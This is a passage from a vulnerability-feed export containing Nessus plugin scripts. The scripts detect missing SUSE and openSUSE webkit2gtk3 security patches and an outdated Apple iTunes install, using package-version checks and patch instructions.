attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4443/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4464/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190146-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7e74bdcd\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2019-146=1\n\nSUSE Linux Enterprise Workstation Extension 12-SP4:zypper in -t patch\nSUSE-SLE-WE-12-SP4-2019-146=1\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2019-146=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP4:zypper in -t\npatch SUSE-SLE-SDK-12-SP4-2019-146=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2019-146=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2019-146=1\n\nSUSE Linux Enterprise Server 12-SP4:zypper in -t patch\nSUSE-SLE-SERVER-12-SP4-2019-146=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2019-146=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2019-146=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2019-146=1\n\nSUSE Linux Enterprise Desktop 12-SP4:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP4-2019-146=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2019-146=1\n\nSUSE Enterprise Storage 4:zypper in -t patch SUSE-Storage-4-2019-146=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwebkit2gtk-4_0-37-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"webkit2gtk3-debugsource-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk3-debugsource-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwebkit2gtk-4_0-37-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk3-debugsource-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"webkit2gtk3-devel-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"webkit2gtk3-debugsource-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-2.32.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk3-debugsource-2.22.5-2.32.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:29:24", "description": "This update for webkit2gtk3 to version 2.22.5 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2018-4438: Fixed a logic issue which lead to memory corruption (bsc#1119554)\n\n - CVE-2018-4437, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4464: Fixed multiple memory corruption issues with improved memory handling (bsc#1119553, bsc#1119555, bsc#1119556, bsc#1119557, bsc#1119558)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update project.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-02-01T00:00:00", "type": "nessus", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2019-108)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2019-108.NASL", "href": "https://www.tenable.com/plugins/nessus/121538", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-108.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121538);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-4437\", \"CVE-2018-4438\", \"CVE-2018-4441\", \"CVE-2018-4442\", \"CVE-2018-4443\", \"CVE-2018-4464\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2019-108)\");\n script_summary(english:\"Check for the openSUSE-2019-108 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.22.5 fixes the following\nissues :\n\nSecurity issues fixed :\n\n - CVE-2018-4438: Fixed a logic issue which lead to memory\n corruption (bsc#1119554)\n\n - CVE-2018-4437, CVE-2018-4441, CVE-2018-4442,\n CVE-2018-4443, CVE-2018-4464: Fixed multiple memory\n corruption issues with improved memory handling\n (bsc#1119553, bsc#1119555, bsc#1119556, bsc#1119557,\n bsc#1119558)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119554\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119555\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119558\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libwebkit2gtk3-lang-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2-4_0-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit-jsc-4-debuginfo-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-debugsource-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-devel-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-minibrowser-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-minibrowser-debuginfo-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.22.5-18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-32bit-2.22.5-18.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:29:48", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.9.2. It is, therefore, affected by multiple vulnerabilities as referenced in the HT209345 advisory.\n\n - Visiting a malicious website may lead to address bar spoofing (CVE-2018-4440)\n\n - Visiting a malicious website may lead to user interface spoofing (CVE-2018-4439)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2018-4437, CVE-2018-4464)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2018-4441, CVE-2018-4442, CVE-2018-4443)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2018-4438)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-12-19T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.9.2 Multiple Vulnerabilities (credentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4439", "CVE-2018-4440", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464"], "modified": "2019-10-31T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_9_2.NASL", "href": "https://www.tenable.com/plugins/nessus/119767", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119767);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/10/31 15:18:52\");\n\n script_cve_id(\n \"CVE-2018-4437\",\n \"CVE-2018-4438\",\n \"CVE-2018-4439\",\n \"CVE-2018-4440\",\n \"CVE-2018-4441\",\n \"CVE-2018-4442\",\n \"CVE-2018-4443\",\n \"CVE-2018-4464\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT209345\");\n\n script_name(english:\"Apple iTunes < 12.9.2 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on remote host is affected by 